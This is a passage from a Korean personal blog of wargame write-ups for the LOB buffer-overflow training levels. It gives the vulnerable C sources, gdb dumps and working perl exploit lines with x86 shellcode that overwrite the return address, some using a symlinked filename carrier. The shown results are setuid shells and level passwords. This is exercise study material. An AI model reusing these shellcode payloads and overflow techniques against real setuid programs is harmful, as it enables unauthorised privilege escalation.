0xbffff710:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff720:     0x00000000      0x00000000      0x4000f7cb      0x4000f7cb
0xbffff730:     0x40013868      0xbffff778      0x4000c84c      0x08048034
0xbffff740:     0x00000006      0xbffff774      0x40013868      0xbffff9a8
0xbffff750:     0x40013da0      0x0001fbf1      0xbffffa50      0x000001fe
0xbffff760:     0x000001fe      0x000001fe      0x000001fe      0x00000006
0xbffff770:     0x08048034      0x080483c0      0xbffff79c      0x40002179
0xbffff780:     0xbffffa40      0x4000220c      0x080483c0      0x40013868
0xbffff790:     0x00000000      0xbffff7f8      0xbffff788      0xbffffa34
0xbffff7a0:     0x400020ea      0xbffffa40      0xbffff808      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\xbf"x44,"\x70\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿poy¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20

Posted by windowhan

,

vampire -> skeleton

Wargame/LOB (Redhat9) 2014. 2. 20. 15:16

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}

풀다가 당황했다...

argv랑 envp랑 다 밀어버리는데 어떻게...

성우형이 알려줫는데 envp 뒤에는 파일명이 자리잡고 있다고 한다.

이것을 이용해서 BOF 하면 될듯.

0xbfffffde:      ""
0xbfffffdf:      ""
0xbfffffe0:      ""
0xbfffffe1:      ""
0xbfffffe2:      ""
0xbfffffe3:      ""
0xbfffffe4:      ""
0xbfffffe5:      ""
0xbfffffe6:      "/home/vampire/tmp/vul"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""

심볼릭 링크를 이용하면 될듯하다.

0xbfffffe6:      ""
0xbfffffe7:      "/home/vampire/tmp/sa"
0xbffffffc:      ""

(gdb) x/100x 0xbfffffe7
0xbfffffe7:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffff7:     0x61732f70      0x00000000      Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7:      "/home/vampire/tmp/sa"
(gdb)

0xbffffb45:0xbffffef8:

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` $(perl -e 'print "\x90"x44,"\x45\xfb\xff\xbf"')

0xbfffff48

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`

(gdb) x/100x 0xbffffa48
0xbffffa48:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffa58:     0x2f2e2f70      0x90909090      0x90909090      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb18:     0x90909090      0x90909090      0x90909090      0xcee28a68
0xbffffb28:     0x0cb16881      0x6a685453      0x68e48a6f      0x63306901
0xbffffb38:     0x74306968      0x59146a69      0x490c0cfe      0xf741fa79
0xbffffb48:     0x00c354e1      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb58:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb68:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb78:     0xbfbfbfbf      0x00000000      0x00000000      0x00000000
0xbffffb88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc8:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffef8: "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0: '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"

gdb 로 스택을 살펴봤을 때, ff가 제대로 안들어가서 계속 stack friends가 뜬거였다.

redhat 6.2인것을 까먹고있었다.;

bash2로 쉘을 바꾼 후에 실행시키니 바로 패스

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20

Posted by windowhan

,

troll -> vampire

Wargame/LOB (Redhat9) 2014. 2. 20. 15:14

[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

보면 return address가 0xbfff~ 면 차단을 하고 있다.

0xbf??~~ 이런 식이어야 한다.

그렇지만 스택의 default address는 0xbfff~~ 이다.

stack size를 늘려서 0xbf??~~ 로 만들어줘야 할 것 같다.

0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %ebp,%esp
0x8048433 <main+3>:     sub    %esp,40
0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   0x8048520
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    %esp,4
0x8048449 <main+25>:    push   0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    %esp,4
0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:    add    %eax,4
0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:    add    %edx,47
0x804845e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x8048461 <main+49>:    je     0x8048480 <main+80>
0x8048463 <main+51>:    push   0x804852c
0x8048468 <main+56>:    call   0x8048350 <printf>
0x804846d <main+61>:    add    %esp,4
0x8048470 <main+64>:    push   0
0x8048472 <main+66>:    call   0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>:    add    %esp,4
0x804847a <main+74>:    lea    %esi,[%esi]
0x8048480 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>:    add    %eax,4
0x8048486 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x8048488 <main+88>:    add    %edx,46
0x804848b <main+91>:    cmp    BYTE PTR [%edx],0xff
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    %esp,4
0x804849d <main+109>:   push   0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    %esp,4
0x80484a7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>:   add    %eax,4
0x80484ad <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    %eax,[%ebp-40]
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    %esp,8
0x80484bc <main+140>:   lea    %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    %esp,8
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop

그리고 argv의 위치는. argv의 길이가 길면 길수록 앞쪽에 배치된다.

---------- //10

argv

... 등등 ebp esp

---------

~~

---------

main frame //1

Little Endian임을 명심하자.

그러기 때문에 argv가 길면 길수록 argv는 작은 주소에서 부터 시작한다.

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "a"x90000'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world

0xbffffc20

0xbffe9c44:

0xbffe4e24

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20

Posted by windowhan

,

orge -> troll

Wargame/LOB (Redhat9) 2014. 2. 20. 15:12

[orge@localhost orge]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\xd3\xfb\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ouy¿

bash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ my-pass

euid = 508

aspirin

bash$

argv[0]을 쓰라고 형이 알려줘서 씀...

처음에는 복사해서 난항이많았지만 링크를 걸었음.

드뎌꺴꾸나

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20

Posted by windowhan

,

windowhan lab

'분류 전체보기'에 해당되는 글 55건

zombie_assassin -> succubus

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

assassin -> zombie_assassin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

giant -> assassin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

bugbear -> giant

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

darkknight -> bugbear

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

golem -> darkknight

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

skeleton -> golem

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

vampire -> skeleton

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

troll -> vampire

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

orge -> troll

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

카테고리

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바


	by windowhan